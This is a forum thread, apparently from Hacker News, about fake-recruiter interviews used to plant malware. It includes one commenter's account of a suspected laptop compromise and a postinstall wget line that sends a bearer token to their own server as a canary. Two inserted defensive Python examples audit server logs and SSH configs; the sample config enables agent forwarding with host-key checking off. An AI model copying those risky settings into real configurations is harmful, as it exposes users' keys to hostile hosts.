(works on Apple M1 laptops, but is slow)


Ha! There's this kind of bad stuff that happens. Back in 2019 my laptop got hacked over the "free wifi" provided in the HQ, had to change all my SSH keys.


> got hacked over the "free wifi" provided in the HQ

elaborate?


Look, it is probably nothing… but anyway, this is not the time nor place to name and shame, but here are more specifics.

So… Interviewer specifically asked me to bring my computer, after the initial intro they asked me to show some code I’d written. I said I’d just connect to my mobile hotspot. They looked shocked and said “I didn’t think you’d have a phone here” (it was an overseas fly out for the day), I said it’s fine, I always have a phone. And they insisted I instead connect to their office wifi.

It was the only wifi I used the whole time I was there.

Back in other country I saw my mail had another logged in session, and a private repo post install script had pulled a resource from my server, from an IP back in the country, and another random country.

The only way to access the private repo was the SSH key (or GitHub credentials). The only way to access Mail was MITM cloning the session or access to the device (more likely - I thought I would have noticed any MITM cert issues).

Incidentally, from the same country, this time another company, I had another fly out interview request a week later and this company also specifically asked me to bring my computer — when I asked if it would be ok if I wasn’t gonna bring my computer because I needed to get it fixed, they got back the next day and said oh, we have to cancel the interview because it won’t be possible for us to proceed.

To proceed… with hacking?

Hahaha, who knows? I’m not expert enough to know what this all means. Maybe it’s nothing. It’s probably nothing.


This sounds to me like you connected to a network on your laptop and cloned an "internal" repo that downloaded something (no different from what Pip or Npm do).

And that your mail client saw a new IP and treated it as a new session? I think assuming you were hacked based on this is paranoid.

> To proceed… with hacking?

Or maybe, they didn't have a laptop for you to use (which is stupid, don't get me wrong) so they couldn't do the next stage unless you had a device. Given you had to use it for the first step, it doesn't seem unlikely.

If they wanted to "hack" you, they didn't need to fly you out, they just needed you to clone the repo and run the script.


Haha, yeah, I understand how you could have misread it like that, I'm sorry the original was not very clear!

Let me try again: they didn't ask me to clone any repos of theirs. They only asked me to show them my private repo on GitHub so they could see some significant work I had done. I just picked some random nothing file and they were satisfied. Then I saw that this private repo had been cloned after that trip. Normally you can't see clone IPs on GitHub but for my install process the npm "postinstall" script pulled something off my web server. Basically I had a line buried in one of the scripts referenced in the postinstall script:

  wget --header="Authorization: Bearer $MY_ACCESS_TOKEN" https://api.myserver.com/data

The only thing that ever pulled off that URL was that private repo postinstall script. After seeing my mail session at a random IP in that country, I thought oh that's probably me, but then I was already back home and I wondered why there was still a session there, so I then checked the logs of my server and saw another IP from that country pulling that URL, from the day after I was there, when I hadn't made any servers there or run that script when there.

What you say about the laptop was what I originally thought: Why do they want me to bring a laptop? Do they seriously believe I don't have a computer? Hahaha

> If they wanted to "hack" you, they didn't need to fly you out, they just needed you to clone the repo and run the script.

I agree it sounds implausible, right? It's probs nothing. Likely I'm just misreading it.

I don't want to jump the gun and I think it's prudent to keep an open mind, I certainly don't want to spread a bs rumour, nor misrepresent a country with something that had not been definitively proven with facts. That would totally lack integrity, be irresponsible, and would be undermining due process and ethics. It would also just be a disgusting, awful betrayal of everything good, so I don't want to jump the gun or name and shame.

I was invited and travelled to many countries for these types of interviews back in the day, all over the world: Europe, USA, Asia, even one in Africa. Definitely had some weird vibes at different places, but never had the same feeling of "hacked" as above.

But just wanted to clarify the facts. Does what I said make sense? Sorry it's late here.
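The commenter's postinstall line doubles as a canary: a request to a URL only that script ever fetches tells you a copy of the repo was installed somewhere. The check they describe (looking through the web server log for hits from an unrecognised address) can be automated. The following is an added example, not the commenter's code: the access-log lines are constructed in combined log format, and the canary path `/data` and the allowlist of the machine you actually ran the install on are assumptions. A `401` on the canary path is just as significant as a `200`: on a foreign machine `$MY_ACCESS_TOKEN` is unset, so the request still arrives but fails authentication.

```python
"""Alert on unexpected hits against a canary URL buried in an install script.

Added example (not the commenter's code). The log lines are constructed in
Nginx/Apache combined format; the canary path and expected IPs are assumptions.
"""
import re
from collections import defaultdict

# Constructed sample access-log lines. The 401 is what a clone on a machine
# without the bearer token in its environment looks like: still a hit.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Sep/2023:09:14:02 +0000] "GET /data HTTP/1.1" 200 512 "-" "Wget/1.21"
203.0.113.10 - - [12/Sep/2023:09:14:03 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.77 - - [13/Sep/2023:14:22:41 +0000] "GET /data HTTP/1.1" 200 512 "-" "Wget/1.21"
192.0.2.200 - - [13/Sep/2023:14:25:09 +0000] "GET /data HTTP/1.1" 401 0 "-" "curl/8.1.2"
198.51.100.77 - - [14/Sep/2023:02:10:00 +0000] "GET /robots.txt HTTP/1.1" 404 0 "-" "Wget/1.21"
"""

# Combined log format: ip ident user [timestamp] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def canary_hits(log_text, canary_path, expected_ips):
    """Map each unexpected client IP to the timestamps of its canary requests.

    Every request to canary_path counts regardless of status code, because the
    point is that the script ran at all; only IPs in expected_ips are ignored.
    """
    unexpected = defaultdict(list)
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or rec["path"] != canary_path:
            continue
        if rec["ip"] in expected_ips:
            continue
        unexpected[rec["ip"]].append(rec["ts"])
    return dict(unexpected)


if __name__ == "__main__":
    # Constructed: the one machine on which the install was legitimately run.
    expected = {"203.0.113.10"}
    for ip, times in canary_hits(SAMPLE_LOG, "/data", expected).items():
        print(f"ALERT canary hit from {ip}: {len(times)} request(s), first at {times[0]}")
```

Running this over the constructed log flags two addresses: one that fetched the resource successfully and one whose request was rejected. In practice you would feed it the real access log and the addresses you know you used; anything else is a machine that obtained your repository.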


> Maybe it’s nothing. It’s probably nothing.

Yep, two different companies flying you out just to hack your shit. It's probably nothing. It makes me curious what you work with. Do you maintain commonly used open source software?


Well I mean, it's not like anyone told me they were hacking stuff. I'm probably just overreacting, or misreading it. Strictly speaking I think it's prudent to keep an open mind until it's definitively proven with evidence, but my current take is what I've said here.

This was at the point in time where I was developing BrowserBox and doing demos but had not released the code publicly.


The same adversary trying to hack twice with the same method is entirely plausible though.

On the other hand if they invited GP to their HQ, they'd have a lot to lose unless the companies were entirely fake.


please name and shame, at least the country.


Not the time or the place. It would be misinterpreted. I don't want it to misrepresent the place.


Or at least which country?


Like I said, man. No. Hope you can respect that.

I don't want to be responsible for misrepresenting a country, and I think it's prudent to keep the protection of privacy there until it's definitively proven with evidence.


Good call.

That's my M.O.

I take it a bit further. I won't go into pissing matches. If folks wanna fight, I'm not the guy to do it.

My general stance is, if it's complimentary/good, I don't worry too much about getting specific. If not, I keep it vague (which sometimes pisses people off, but life is not fair).

I generally don't name my former employers, just to keep their name out of venues where someone else with a grudge could throw poo (see "Apple" -not a former employer of mine).


Me too man. I don’t like saying negative stuff about people, especially unprovoked (is not a counter). Feels like a grave responsibility. Always been that way! I love complimenting people.

I’m not sure if it’s connected but in the general sphere of things, maybe one downside I’ve noticed in my life is I can be a bit slow to notice when someone or something isn’t good for me. Even if it’s obvious to others, I always wanna see the good, sometimes I think I’m in denial willingly! Haha… So I have learned to become aware of such people and their behavior, pattern recognition.


I've learned to keep some relationships at arm's length.

It's a long story, but I have spent my entire adult life, dealing with some of the most dangerous, doesn't-play-well-with-others people on earth. I'm proud to call some of them friends, and have learned to politely avoid getting too entangled with the drama of others.

I've learned that I'm responsible for enforcing my own boundaries, and that I don't need to use nukes. Often a simple "No, I'm not going to do that, but I will do this..." is sufficient.


What exactly did you do over the wifi? How do you think they were able to access your private SSH key by simply having your laptop join their wifi? Did you leave the laptop unattended and unlocked?


They asked to view some private repo on GitHub, just whatever random file I chose to show them to see an example of some significant work.

> How do you think they were able to access your private SSH key by simply having your laptop join their wifi?

I don't know. I assume it's possible, I thought you could get hacked over open wifi? Anyway, but how would it be done do you think?

If it's only MITM then perhaps SSH keys were not compromised. But I didn't take that chance. I just changed everything.


> but how would it be done do you think?

That's what I'm trying to figure out. Open wifi or not, your private SSH key shouldn't leave your PC when you're using it. Ditto for whatever sites you visit over HTTPS; the whole point of TLS is to avoid MITMing connections and extracting their contents.


I'd assumed that somehow connecting to or using their wifi got local privileges?

There's things like cellular modem exploits that bypass all the higher layers of the stack and get access to your cell phone at the base layer. I'm guessing similar stuff exists for wifi. Heck it could have even been a power cable I maybe mistakenly plugged in trusting it! I'm not an expert on any of this tho.

With the MITM I think you're right, I would have expected to see some cert issues. But I know I have seen GitHub MITM'ing before with a state issued MITM certificate (won't say where right now), tho I did notice that because there were connection issues and then I paid attention to the address bar.

It could have been that there were cert issues, I just wasn't paying attention to them, as it was an interview. That sounds plausible.

I guess the issue is there's all kinds of exploits and zero days that most regular people don't really know. Of course they could have combined it with a PDF exploit from something they emailed me. I don't know!

Did you find anything on this in the meantime, on theories on the different ways it could be possible? How would you rate your cybersecurity redteam/blueteam knowledge in this domain on a scale of 1 to 10 (10 being best)?


Some kind of unknown wifi attack seems the most plausible to extract the SSH key if you confirm you haven't left the laptop unattended and everything else is reasonably secured.

Although your certificate point did give me pause. Don't you have the private SSH key stored somewhere accessible from GitHub? Like some kind of action or whatnot.

Also, is that key not password-protected? Did you ignore some SSH connection warnings and forward your agent?

I don't work in cybersecurity, so let's just say that my redteam knowledge is 1. I just try to understand how things work and protect my stuff as best I can. I'm just very surprised since your situation seems, on the surface at least, to fly in the face of what is commonly expected.
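The agent-forwarding question above is worth checking mechanically, because a `ForwardAgent yes` line in `~/.ssh/config` is easy to forget and lets whichever host you land on sign with your key while the session is open; paired with `StrictHostKeyChecking no` you would not even see the host-key warning that a spoofed server would otherwise trigger. The following is an added example, not the commenter's code: a small audit that parses a constructed `ssh_config` and reports, per host, what `ForwardAgent` resolves to under ssh's first-obtained-value rule. It handles the `Host` patterns and negations from `ssh_config(5)`, and assumes the space-separated `Option value` spelling (the `Option=value` form and `Match` blocks are not parsed).

```python
"""Audit an ssh_config for hosts that end up with agent forwarding enabled.

Added example, not the commenter's code. The config text is constructed;
the hostnames audited are assumptions for illustration. Only the
'Option value' syntax and 'Host' blocks are parsed, not 'Match' or 'Option=value'.
"""
import fnmatch

# Constructed sample ~/.ssh/config. 'Host *' last, as ssh_config(5) recommends,
# so that specific blocks take effect before the catch-all defaults.
SAMPLE_CONFIG = """\
Host build-*.internal.example
    ForwardAgent yes

Host interview-demo
    HostName 198.51.100.5
    User demo
    ForwardAgent yes
    StrictHostKeyChecking no   # silences the warning a spoofed host would trigger

Host *
    ForwardAgent no
    AddKeysToAgent yes
"""


def parse_ssh_config(text):
    """Return [(patterns, {option: value}), ...] in file order.

    Options seen before any Host line apply to every host. Within a block the
    first occurrence of an option wins, matching ssh's own behaviour.
    """
    blocks = []
    current = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line:
            continue
        key, _, value = line.partition(" ")
        key, value = key.lower(), value.strip()
        if key == "host":
            current = (value.split(), {})
            blocks.append(current)
        else:
            if current is None:
                current = (["*"], {})
                blocks.append(current)
            current[1].setdefault(key, value)
    return blocks


def effective_option(blocks, hostname, option, default):
    """Resolve an option for hostname the way ssh does: walk blocks in order,
    skip blocks whose negated pattern matches, and return the first value found."""
    for patterns, opts in blocks:
        negated = [p[1:] for p in patterns if p.startswith("!")]
        positive = [p for p in patterns if not p.startswith("!")]
        if any(fnmatch.fnmatchcase(hostname, p) for p in negated):
            continue
        if any(fnmatch.fnmatchcase(hostname, p) for p in positive) and option in opts:
            return opts[option]
    return default


def forwarding_hosts(text, hostnames):
    """Return {hostname: settings} for hosts whose effective ForwardAgent is yes,
    recording StrictHostKeyChecking alongside so the risky combination is visible."""
    blocks = parse_ssh_config(text)
    findings = {}
    for host in hostnames:
        forward = effective_option(blocks, host, "forwardagent", "no").lower()
        strict = effective_option(blocks, host, "stricthostkeychecking", "ask").lower()
        if forward == "yes":
            findings[host] = {"forwardagent": forward, "stricthostkeychecking": strict}
    return findings


if __name__ == "__main__":
    # Constructed list of hosts to audit against the sample config.
    audited = ["build-01.internal.example", "interview-demo", "prod.example.org"]
    for host, settings in forwarding_hosts(SAMPLE_CONFIG, audited).items():
        flag = " (host-key checking disabled!)" if settings["stricthostkeychecking"] == "no" else ""
        print(f"{host}: ForwardAgent yes{flag}")
```

The order of blocks matters more than people expect: had `Host *` with `ForwardAgent no` been placed first, ssh would take that value for every host and the later `yes` lines would be dead, which is why the audit resolves options the way ssh does rather than just grepping for the string.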


+1 and pip'd for reporting... amazon sucks


Thanks for the encouragement! But oh I’m not sure what you mean with Amazon. I didn’t say that was the company and for the record Amazon wasn’t involved as far as I know.

Also I didn’t think the original article was referring to Amazon but I could be wrong about that, sorry.


> Two malicious executables... The first one is a Hello World project... The second prints a Fibonacci sequence up to the largest element smaller than the number entered as input.

That should have been the first tip-off that something was wrong; Meta would start with a LeetCode medium or hard.


The security on this website is fantastic. They have disabled the use of the arrow keys to scroll the content of their pages. This must obviously be due to a previously unknown attack vector via the use of the keyboard. Bravo!


you can just attribute everything to the Lazarus Group these days

> hacks and leaks earnings report and insider trades but only right after it leaks <

“North Korea did it wdym”

> investigators find planted reference to an APAC timezone or font within the exploit <

case closed


>One of these RATs is already known to be part of the Lazarus toolkit, specifically a variant of the BlindingCan backdoor with limited functionality but identical command processing logic.

The attackers were using already known Lazarus malware. The researchers aren't simply basing the Lazarus attribution solely on an insider trading strategy or time zones.


already known means everyone that knows can also do it


Threat intel and analysis is just like any other analysis, it is taking a heuristic approach to finding answers.

Can it be bypassed? Yes.

Are the researchers whose entire company hinges on the correctness of their analysis doing their absolute best to attribute the attack to a threat actor? Yes.

So to your point, somebody could indeed reuse malware or attempt to replicate it. However, the researchers are likely analyzing the disassembly and bytecode, and replicating complex malware to perfectly imitate a known family of malware is exceptionally difficult and statistically very unlikely. This is how threat intel is able to make any sort of claim of attribution.


In this case it was a modified version. Meaning the attackers have access to the source code. Not everyone has access to the malware's source code.


This kind of comment exists on every security thread and it's amusing. Even if they know for sure the identity of the hackers, they wouldn't risk revealing their tools and methods just to satisfy the general audience. Do you think they care if the HN crowd is happy with their finding?


Seems like next time you should ask for access to a cloud server. But wait... if they are fake-recruiting cybersecurity experts, you could end up hacking someone else's site.


Another reminder I should seriously look into qubes-os.


Clever and probably they had a high percentage success rate


Old news. Wasn't that posted like 2 weeks ago?


LinkedIn was a great platform, weaponized by Microsoft as the biggest security risk. There is no innovation for security, making it feature rich and more user friendly.


Ultimately, what made this attack possible and effective is the low morals of the people who applied to other jobs behind their employer's back, on their employer's computers.


> low morals ... behind their employer's back

Employees don't belong to their employer. There is nothing wrong with trying to acquire a potentially better job. The only real problem is they were using company resources to do so. Also, they were completely incompetent by running random executables.

